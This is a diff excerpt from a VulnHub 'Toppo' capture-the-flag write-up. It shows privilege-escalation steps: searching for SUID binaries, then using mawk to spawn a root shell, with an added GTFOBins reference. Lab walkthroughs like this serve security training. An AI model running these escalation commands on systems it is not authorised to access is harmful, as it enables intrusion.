luisegarduno/VulnHub/toppo.md

 5. Next find a list of all programs the logged in user has permissions to:
      * `find / -perm -u=s -type f 2>/dev/null`

-6. Within the output we see that *mawk* is available, which we will then use to spawn in sh shell:
+6. Within the output we see that *mawk* is available, which we will then use to spawn in sh shell (see [GTFOBins](https://gtfobins.github.io/gtfobins/mawk/#sudo)):
      * `mawk 'BEGIN {system("/bin/sh")}'`

 7. Once it has spawned, find & print the flag: